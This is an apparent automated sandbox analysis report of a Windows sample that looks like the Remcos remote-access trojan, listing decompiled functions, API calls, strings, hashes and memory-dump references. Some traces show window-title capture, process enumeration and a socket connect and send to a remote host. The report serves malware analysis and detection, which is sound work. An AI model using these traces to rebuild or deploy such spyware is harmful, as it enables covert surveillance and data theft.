                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                            • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                                                                                                                                                                                                                            Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B90,0040483F,00000001,?,?,00000000,00475B90,004017F3), ref: 00404AED
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404AF9
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404B04
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404B0D
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                                                                            • String ID: KeepAlive | Disabled
                                                                                                                                                                                                                                            • API String ID: 2993684571-305739064
                                                                                                                                                                                                                                            • Opcode ID: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
                                                                                                                                                                                                                                            • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                                                                                                                                                                                                            Function 00419F42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                                                                                                                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F89
                                                                                                                                                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                                                                            • String ID: Alarm triggered
                                                                                                                                                                                                                                            • API String ID: 614609389-2816303416
                                                                                                                                                                                                                                            • Opcode ID: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
                                                                                                                                                                                                                                            • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                                                                                                                                                                                                            Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                                                                                                                                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                                                                                                                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                                                                                                                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                                                                            • API String ID: 3024135584-2418719853
                                                                                                                                                                                                                                            • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                                                                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                                                                                                                            Function 0044017A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                                                                                                                                                            • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                                                                                                                                                                                                            Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3525466593-0
                                                                                                                                                                                                                                            • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                                                                                                                                            • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                                                                                                                                                            Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                                                                                              • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                                                                                                                                                                                                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                                                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4269425633-0
                                                                                                                                                                                                                                            • Opcode ID: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                                                                                                                                                                                                            • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                                                                                                                                                                                                            Function 004430A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                            • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                                                                                                                                                                                                            Function 0044FEE3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0044FFD4
                                                                                                                                                                                                                                              • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1857427562-0
                                                                                                                                                                                                                                            • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                                                                                                                                                            • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                                                                                                                                                                                                            Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                                                                                                                                                                                                              • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044E1B0
                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2278895681-0
                                                                                                                                                                                                                                            • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                                                                                                                                                            • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                                                                                                                                                                                                            Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044F7C5
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044F7D7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044F7E9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044F7FB
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044F80D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                            • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                                                                                                                                                            Function 004432F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00443315
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00443327
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044333A
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044334B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044335C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                            • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                                                                                                                                                                                                            Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                                                                                                                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                                                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                                                                                            • String ID: (FG
                                                                                                                                                                                                                                            • API String ID: 3142014140-2273637114
                                                                                                                                                                                                                                            • Opcode ID: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                                                                                                                                                                                                            • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                                                                                                                                                                                                            Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                                                              • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                                                                            • String ID: XCG$`AG$>G
                                                                                                                                                                                                                                            • API String ID: 2334542088-2372832151
                                                                                                                                                                                                                                            • Opcode ID: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                                                                                                                                                                                                            • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                                                                                                                                                            Function 004426E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\iGhDjzEiDU.exe,00000104), ref: 00442724
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004427EF
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004427F9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\iGhDjzEiDU.exe
                                                                                                                                                                                                                                            • API String ID: 2506810119-3688419076
